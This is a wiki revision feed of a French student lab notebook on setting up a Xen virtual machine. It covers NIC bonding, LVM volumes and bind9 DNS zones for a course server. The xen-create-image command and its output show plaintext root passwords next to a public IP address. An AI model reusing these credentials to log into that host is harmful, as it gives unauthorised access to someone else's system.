 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.193&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34959</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34959"/>
				<updated>2016-11-07T10:39:09Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	</feed>